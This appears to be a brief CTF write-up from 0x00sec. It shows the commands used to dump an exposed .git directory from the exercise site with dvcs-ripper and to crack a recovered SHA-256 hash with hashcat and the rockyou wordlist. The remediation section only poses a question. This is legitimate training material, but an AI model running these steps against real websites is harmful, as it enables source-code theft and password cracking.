0x00sec CTF Exercise #1 Remediation

The Attack

Anyway, let’s get straight to it. You can find the exercise here. As noted, there are multiple ways to solve this. The first exercise is about web security. It looks like this.

0x00sec Exercise #1
Bootstrap
A hint!
git clone https://github.com/kost/dvcs-ripper.git
cd dvcs-ripper/
./rip-git.pl -v -u https://exercise-1.0x00sec.dev/.git
git clone https://github.com/hashcat/hashcat.git 
make && make install
gunzip rockyou.txt.gz
hashcat -a 0 -m 1400 ~/Desktop/hash.txt ~/Downloads/Hob0Rules-master/wordlists/rockyou.txt -r ~/Downloads/Hob0Rules-master/hob064.rule -o ~/Desktop/cracked.txt

Remediation

Now that you see how the login is obtained, we want to make sure this doesn’t happen to our client. What can we do?

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store